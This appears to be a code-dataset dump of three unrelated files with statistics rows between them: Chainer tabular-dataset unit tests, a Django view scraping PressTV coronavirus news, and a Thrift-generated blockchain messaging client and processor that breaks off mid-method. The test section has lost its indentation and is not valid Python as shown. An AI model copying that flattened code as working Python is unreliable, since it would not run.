self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a',))
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [7, 8])
self.assertIsInstance(output, list)
def test_unary_callable_unary(self):
dataset = tabular.from_data(('a', lambda i: i * i), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a',))
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [1, 9])
self.assertIsInstance(output, list)
def test_unary_callable_tuple(self):
dataset = tabular.from_data(
(('a', 'b'), lambda i: (i * i, -i)), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 9], [-1, -3]))
for out in output:
self.assertIsInstance(out, list)
def test_unary_callable_dict(self):
dataset = tabular.from_data(
(('a', 'b'), lambda i: {'a': i * i, 'b': -i}), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 9], 'b': [-1, -3]})
for out in output.values():
self.assertIsInstance(out, list)
def test_unary_callable_without_key(self):
with self.assertRaises(ValueError):
tabular.from_data(lambda i: i * i, size=10)
def test_unary_callable_without_size(self):
with self.assertRaises(ValueError):
tabular.from_data(('a', lambda i: i * i))
def test_tuple_array_list(self):
dataset = tabular.from_data(
(np.arange(10), [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [7, 8]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_with_key_list(self):
dataset = tabular.from_data(
(('a', np.arange(10)), [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.keys[0], 'a')
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [7, 8]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_list_with_key(self):
dataset = tabular.from_data(
(np.arange(10), ('b', [2, 7, 1, 8, 4, 5, 9, 0, 3, 6])))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.keys[1], 'b')
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [7, 8]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_callable_unary(self):
dataset = tabular.from_data((np.arange(10), ('b', lambda i: i * i)))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.keys[1], 'b')
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_callable_tuple(self):
dataset = tabular.from_data(
(np.arange(10), (('b', 'c'), lambda i: (i * i, -i))))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 3)
self.assertEqual(dataset.keys[1:], ('b', 'c'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9], [-1, -3]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_callable_dict(self):
dataset = tabular.from_data(
(np.arange(10), (('b', 'c'), lambda i: {'b': i * i, 'c': -i})))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 3)
self.assertEqual(dataset.keys[1:], ('b', 'c'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9], [-1, -3]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_with_key_callable_unary(self):
dataset = tabular.from_data(
(('a', np.arange(10)), ('b', lambda i: i * i)))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_callable_unary_callable_unary(self):
dataset = tabular.from_data(
(('a', lambda i: i * i), ('b', lambda i: -i)), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 9], [-1, -3]))
self.assertIsInstance(output[0], list)
self.assertIsInstance(output[1], list)
def test_tuple_callable_unary_callable_unary_without_size(self):
with self.assertRaises(ValueError):
tabular.from_data((('a', lambda i: i * i), ('b', lambda i: -i)))
def test_dict_array_list(self):
dataset = tabular.from_data(
{'a': np.arange(10), 'b': [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 3], 'b': [7, 8]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
def test_dict_array_callable_unary(self):
dataset = tabular.from_data({'a': np.arange(10), 'b': lambda i: i * i})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 3], 'b': [1, 9]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
def test_dict_array_callable_tuple(self):
dataset = tabular.from_data(
{'a': np.arange(10), ('b', 'c'): lambda i: (i * i, -i)})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b', 'c'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(
output, {'a': [1, 3], 'b': [1, 9], 'c': [-1, -3]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
self.assertIsInstance(output['c'], list)
def test_dict_array_callable_dict(self):
dataset = tabular.from_data(
{'a': np.arange(10), ('b', 'c'): lambda i: {'b': i * i, 'c': -i}})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b', 'c'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(
output, {'a': [1, 3], 'b': [1, 9], 'c': [-1, -3]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
self.assertIsInstance(output['c'], list)
def test_dict_callable_unary_callable_unary(self):
dataset = tabular.from_data(
{'a': lambda i: i * i, 'b': lambda i: -i}, size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 9], 'b': [-1, -3]})
self.assertIsInstance(output['a'], list)
self.assertIsInstance(output['b'], list)
def test_dict_callable_unary_callable_unary_without_size(self):
with self.assertRaises(ValueError):
tabular.from_data(({'a': lambda i: i * i, 'b': lambda i: -i}))
def test_unique(self):
    """Auto-generated keys differ between independently built datasets."""
    first = tabular.from_data(np.arange(10))
    second = tabular.from_data(np.arange(10))
    self.assertNotEqual(first.keys, second.keys)
# Run this test module's cases when the file is executed directly.
testing.run_module(__name__, __file__)
| 39.253205 | 79 | 0.616314 | 1,540 | 12,247 | 4.798052 | 0.045455 | 0.121803 | 0.116119 | 0.094735 | 0.963865 | 0.958316 | 0.941399 | 0.93558 | 0.879415 | 0.85925 | 0 | 0.030354 | 0.222585 | 12,247 | 311 | 80 | 39.379421 | 0.74572 | 0 | 0 | 0.720833 | 0 | 0 | 0.00792 | 0 | 0 | 0 | 0 | 0 | 0.604167 | 1 | 0.104167 | false | 0 | 0.020833 | 0 | 0.129167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e94c75fa374581f25226061c13d417072a542817 | 5,179 | py | Python | pressTv/views.py | jafarzadeh-1998/Coronavirus-News-Crawler | aae34075b0f39b4490b6b562a18a195addc8b554 | [
"MIT"
] | null | null | null | pressTv/views.py | jafarzadeh-1998/Coronavirus-News-Crawler | aae34075b0f39b4490b6b562a18a195addc8b554 | [
"MIT"
] | null | null | null | pressTv/views.py | jafarzadeh-1998/Coronavirus-News-Crawler | aae34075b0f39b4490b6b562a18a195addc8b554 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.http import JsonResponse
from django.views.generic import TemplateView
import requests, urllib, datetime
from bs4 import BeautifulSoup as bs
class index(TemplateView):
    """Landing page listing PressTV coronavirus news from the last 30 days.

    Scrapes the PressTV search results for two keywords ("COVID-19" and
    "coronavirus"), de-duplicates by article link, and exposes the merged
    list (newest first) to the template as ``newsList``.
    """

    template_name = "pressTv/index.html"

    # NOTE(review): the original URL contained '§ion=1' — mojibake from
    # '&sect' + 'ion=1' — restored here to the intended '&section=1' param.
    BASE_URL = ('https://www.presstv.com/default/search'
                '?q={keyword}&from={from_}&to={to}&section=1&page=1')

    @staticmethod
    def _collect_results(container, news_list, seen_links):
        """Append parsed result items from one search page to *news_list*.

        Articles whose link is already in *seen_links* are skipped, so the
        same story found under both keywords is listed once.
        """
        for news in container.find_all("a", class_="result-item-link"):
            link = "https://www.presstv.com" + news.get("href")
            if link in seen_links:
                continue
            seen_links.add(link)
            title = news.find("div", class_="result-item-title").get_text()
            summary = news.find("div", class_="result-item-summery").get_text()
            pubdate = news.find("span", class_="result-item-puddate").get_text()
            # Drop the leading weekday ("Mon, May 4 2020" -> " May 4 2020")
            # so the remainder matches the " %B %d %Y " format.
            raw_date = "".join(pubdate.split(",")[1:])
            parsed_date = datetime.datetime.strptime(raw_date, " %B %d %Y ")
            news_list.append({"link": link,
                              "pubdate": pubdate,
                              "title": title,
                              "summary": summary,
                              "date": parsed_date})

    def get_context_data(self, **kwargs):
        """Build the template context with the scraped, date-sorted news."""
        context = super().get_context_data(**kwargs)
        today = datetime.date.today()
        month_ago = today - datetime.timedelta(days=30)
        news_list = []
        seen_links = set()
        for keyword in ("COVID-19", "coronavirus"):
            url = self.BASE_URL.format(keyword=keyword,
                                       to=str(today),
                                       from_=str(month_ago))
            container = bs(requests.get(url=url).content, "html.parser")
            self._collect_results(container, news_list, seen_links)
        context["newsList"] = sorted(
            news_list, key=lambda n: n["date"], reverse=True)
        return context
def changePage(request, pageNum):
    """AJAX endpoint returning page *pageNum* of coronavirus news as JSON.

    Mirrors ``index.get_context_data``: scrapes PressTV search results for
    "COVID-19" and "coronavirus", de-duplicates by link, sorts newest
    first, and returns ``{"newsList": [...]}`` (datetimes are serialized
    by Django's default JSON encoder).
    """
    # NOTE(review): '§ion=1' in the original was mojibake for '&section=1'.
    # str(pageNum) keeps this working when the URLconf passes an int.
    base_url = ('https://www.presstv.com/default/search'
                '?q={keyword}&from={from_}&to={to}&section=1&page='
                + str(pageNum))
    today = datetime.date.today()
    month_ago = today - datetime.timedelta(days=30)
    news_list = []
    seen_links = set()
    for keyword in ("COVID-19", "coronavirus"):
        url = base_url.format(keyword=keyword,
                              to=str(today),
                              from_=str(month_ago))
        container = bs(requests.get(url=url).content, "html.parser")
        for news in container.find_all("a", class_="result-item-link"):
            link = "https://www.presstv.com" + news.get("href")
            if link in seen_links:
                continue
            seen_links.add(link)
            title = news.find("div", class_="result-item-title").get_text()
            summary = news.find("div", class_="result-item-summery").get_text()
            pubdate = news.find("span", class_="result-item-puddate").get_text()
            # Drop the leading weekday so the rest matches " %B %d %Y ".
            raw_date = "".join(pubdate.split(",")[1:])
            parsed_date = datetime.datetime.strptime(raw_date, " %B %d %Y ")
            news_list.append({"link": link,
                              "pubdate": pubdate,
                              "title": title,
                              "summary": summary,
                              "date": parsed_date})
    news_list.sort(key=lambda n: n["date"], reverse=True)
    return JsonResponse(data={"newsList": news_list})
| 50.281553 | 111 | 0.568063 | 562 | 5,179 | 5.129893 | 0.174377 | 0.061048 | 0.083247 | 0.055498 | 0.86854 | 0.86854 | 0.86854 | 0.86854 | 0.86854 | 0.86854 | 0 | 0.00535 | 0.278239 | 5,179 | 102 | 112 | 50.77451 | 0.765918 | 0 | 0 | 0.835165 | 0 | 0.021978 | 0.171269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021978 | false | 0 | 0.054945 | 0 | 0.120879 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e95107f84646105e3e07564a837ce90479a66ace | 51,450 | py | Python | blockchain/gen/messaging/BlockchainService.py | ManazRT/Dragonchain | d119b23366b329bab0637e3d1979a665f07bb109 | [
"Apache-2.0"
] | null | null | null | blockchain/gen/messaging/BlockchainService.py | ManazRT/Dragonchain | d119b23366b329bab0637e3d1979a665f07bb109 | [
"Apache-2.0"
] | null | null | null | blockchain/gen/messaging/BlockchainService.py | ManazRT/Dragonchain | d119b23366b329bab0637e3d1979a665f07bb109 | [
"Apache-2.0"
] | null | null | null | #
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import logging
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
  """Abstract service interface for blockchain node-to-node messaging.

  Generated by the Thrift compiler (0.9.3). Server-side handlers
  implement these methods; remote callers use the Client stub below.
  """
  def ping(self):
    # Liveness probe; no arguments, no return value.
    pass

  def get_node_info(self):
    # Returns this node's descriptor (a Node struct, per
    # get_node_info_result); the handler may raise UnauthorizedException.
    pass

  def register_node(self, node, pass_phrase):
    """
    Parameters:
     - node
     - pass_phrase
    """
    pass

  def unregister_node(self, pass_phrase):
    """
    Parameters:
     - pass_phrase
    """
    # Declared oneway in the IDL: the Client sends it fire-and-forget.
    pass

  def phase_1_message(self, p1):
    """
    Parameters:
     - p1
    """
    pass

  def phase_2_message(self, p2):
    """
    Parameters:
     - p2
    """
    pass

  def phase_3_message(self, p3):
    """
    Parameters:
     - p3
    """
    pass

  def phase_4_message(self, p4):
    """
    Parameters:
     - p4
    """
    pass

  def phase_5_message(self, p5):
    """
    Parameters:
     - p5
    """
    pass

  def get_peers(self):
    # Returns this node's peer list; the handler may raise
    # UnauthorizedException (see get_peers_result).
    pass
class Client(Iface):
  """Thrift RPC client stub for the blockchain messaging service.

  Each public method serializes a ``<name>_args`` struct onto the output
  protocol via ``send_<name>`` and, for two-way calls, blocks in
  ``recv_<name>`` reading the matching ``<name>_result`` struct.
  ``unregister_node`` is oneway: it only sends.
  """
  def __init__(self, iprot, oprot=None):
    # When no separate output protocol is given, the input protocol is
    # used for both directions.
    self._iprot = self._oprot = iprot
    if oprot is not None:
      self._oprot = oprot
    self._seqid = 0

  def ping(self):
    self.send_ping()
    self.recv_ping()

  def send_ping(self):
    self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
    args = ping_args()
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_ping(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      # Server-side failure: deserialize and re-raise locally.
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = ping_result()
    result.read(iprot)
    iprot.readMessageEnd()
    return

  def get_node_info(self):
    self.send_get_node_info()
    return self.recv_get_node_info()

  def send_get_node_info(self):
    self._oprot.writeMessageBegin('get_node_info', TMessageType.CALL, self._seqid)
    args = get_node_info_args()
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_get_node_info(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = get_node_info_result()
    result.read(iprot)
    iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.unauthorized is not None:
      # Declared exception from the IDL, re-raised for the caller.
      raise result.unauthorized
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_node_info failed: unknown result")

  def register_node(self, node, pass_phrase):
    """
    Parameters:
     - node
     - pass_phrase
    """
    self.send_register_node(node, pass_phrase)
    return self.recv_register_node()

  def send_register_node(self, node, pass_phrase):
    self._oprot.writeMessageBegin('register_node', TMessageType.CALL, self._seqid)
    args = register_node_args()
    args.node = node
    args.pass_phrase = pass_phrase
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_register_node(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = register_node_result()
    result.read(iprot)
    iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.unauthorized is not None:
      raise result.unauthorized
    raise TApplicationException(TApplicationException.MISSING_RESULT, "register_node failed: unknown result")

  def unregister_node(self, pass_phrase):
    """
    Parameters:
     - pass_phrase
    """
    # Oneway call: nothing is read back from the server.
    self.send_unregister_node(pass_phrase)

  def send_unregister_node(self, pass_phrase):
    self._oprot.writeMessageBegin('unregister_node', TMessageType.ONEWAY, self._seqid)
    args = unregister_node_args()
    args.pass_phrase = pass_phrase
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def phase_1_message(self, p1):
    """
    Parameters:
     - p1
    """
    self.send_phase_1_message(p1)
    self.recv_phase_1_message()

  def send_phase_1_message(self, p1):
    self._oprot.writeMessageBegin('phase_1_message', TMessageType.CALL, self._seqid)
    args = phase_1_message_args()
    args.p1 = p1
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_phase_1_message(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = phase_1_message_result()
    result.read(iprot)
    iprot.readMessageEnd()
    return

  def phase_2_message(self, p2):
    """
    Parameters:
     - p2
    """
    self.send_phase_2_message(p2)
    self.recv_phase_2_message()

  def send_phase_2_message(self, p2):
    self._oprot.writeMessageBegin('phase_2_message', TMessageType.CALL, self._seqid)
    args = phase_2_message_args()
    args.p2 = p2
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_phase_2_message(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = phase_2_message_result()
    result.read(iprot)
    iprot.readMessageEnd()
    return

  def phase_3_message(self, p3):
    """
    Parameters:
     - p3
    """
    self.send_phase_3_message(p3)
    self.recv_phase_3_message()

  def send_phase_3_message(self, p3):
    self._oprot.writeMessageBegin('phase_3_message', TMessageType.CALL, self._seqid)
    args = phase_3_message_args()
    args.p3 = p3
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_phase_3_message(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = phase_3_message_result()
    result.read(iprot)
    iprot.readMessageEnd()
    return

  def phase_4_message(self, p4):
    """
    Parameters:
     - p4
    """
    self.send_phase_4_message(p4)
    self.recv_phase_4_message()

  def send_phase_4_message(self, p4):
    self._oprot.writeMessageBegin('phase_4_message', TMessageType.CALL, self._seqid)
    args = phase_4_message_args()
    args.p4 = p4
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_phase_4_message(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = phase_4_message_result()
    result.read(iprot)
    iprot.readMessageEnd()
    return

  def phase_5_message(self, p5):
    """
    Parameters:
     - p5
    """
    self.send_phase_5_message(p5)
    self.recv_phase_5_message()

  def send_phase_5_message(self, p5):
    self._oprot.writeMessageBegin('phase_5_message', TMessageType.CALL, self._seqid)
    args = phase_5_message_args()
    args.p5 = p5
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_phase_5_message(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = phase_5_message_result()
    result.read(iprot)
    iprot.readMessageEnd()
    return

  def get_peers(self):
    self.send_get_peers()
    return self.recv_get_peers()

  def send_get_peers(self):
    self._oprot.writeMessageBegin('get_peers', TMessageType.CALL, self._seqid)
    args = get_peers_args()
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()

  def recv_get_peers(self):
    iprot = self._iprot
    (fname, mtype, rseqid) = iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(iprot)
      iprot.readMessageEnd()
      raise x
    result = get_peers_result()
    result.read(iprot)
    iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.unauthorized is not None:
      raise result.unauthorized
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get_peers failed: unknown result")
class Processor(Iface, TProcessor):
  """Server-side dispatcher: reads a call off the wire, invokes the
  handler, and writes the reply (or exception) back.

  Generated by the Thrift compiler; one ``process_<name>`` method per
  service method, routed through ``_processMap``.
  """
  def __init__(self, handler):
    self._handler = handler
    self._processMap = {}
    self._processMap["ping"] = Processor.process_ping
    self._processMap["get_node_info"] = Processor.process_get_node_info
    self._processMap["register_node"] = Processor.process_register_node
    self._processMap["unregister_node"] = Processor.process_unregister_node
    self._processMap["phase_1_message"] = Processor.process_phase_1_message
    self._processMap["phase_2_message"] = Processor.process_phase_2_message
    self._processMap["phase_3_message"] = Processor.process_phase_3_message
    self._processMap["phase_4_message"] = Processor.process_phase_4_message
    self._processMap["phase_5_message"] = Processor.process_phase_5_message
    self._processMap["get_peers"] = Processor.process_get_peers

  def process(self, iprot, oprot):
    # Read the next call and dispatch; unknown names get an
    # UNKNOWN_METHOD exception written back to the caller.
    (name, type, seqid) = iprot.readMessageBegin()
    if name not in self._processMap:
      iprot.skip(TType.STRUCT)
      iprot.readMessageEnd()
      x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
      oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
      x.write(oprot)
      oprot.writeMessageEnd()
      oprot.trans.flush()
      return
    else:
      self._processMap[name](self, seqid, iprot, oprot)
    return True

  def process_ping(self, seqid, iprot, oprot):
    args = ping_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = ping_result()
    try:
      self._handler.ping()
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      # Transport failures and shutdown signals propagate to the server loop.
      raise
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("ping", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_get_node_info(self, seqid, iprot, oprot):
    args = get_node_info_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_node_info_result()
    try:
      result.success = self._handler.get_node_info()
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except UnauthorizedException as unauthorized:
      # Declared IDL exception: sent back as a normal REPLY field.
      msg_type = TMessageType.REPLY
      result.unauthorized = unauthorized
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("get_node_info", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_register_node(self, seqid, iprot, oprot):
    args = register_node_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = register_node_result()
    try:
      result.success = self._handler.register_node(args.node, args.pass_phrase)
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except UnauthorizedException as unauthorized:
      msg_type = TMessageType.REPLY
      result.unauthorized = unauthorized
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("register_node", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_unregister_node(self, seqid, iprot, oprot):
    # Oneway method: no reply is written; handler errors (other than
    # transport failures / shutdown signals) are deliberately dropped.
    args = unregister_node_args()
    args.read(iprot)
    iprot.readMessageEnd()
    try:
      self._handler.unregister_node(args.pass_phrase)
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except:
      pass

  def process_phase_1_message(self, seqid, iprot, oprot):
    args = phase_1_message_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = phase_1_message_result()
    try:
      self._handler.phase_1_message(args.p1)
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("phase_1_message", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_phase_2_message(self, seqid, iprot, oprot):
    args = phase_2_message_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = phase_2_message_result()
    try:
      self._handler.phase_2_message(args.p2)
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("phase_2_message", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_phase_3_message(self, seqid, iprot, oprot):
    args = phase_3_message_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = phase_3_message_result()
    try:
      self._handler.phase_3_message(args.p3)
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("phase_3_message", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_phase_4_message(self, seqid, iprot, oprot):
    args = phase_4_message_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = phase_4_message_result()
    try:
      self._handler.phase_4_message(args.p4)
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
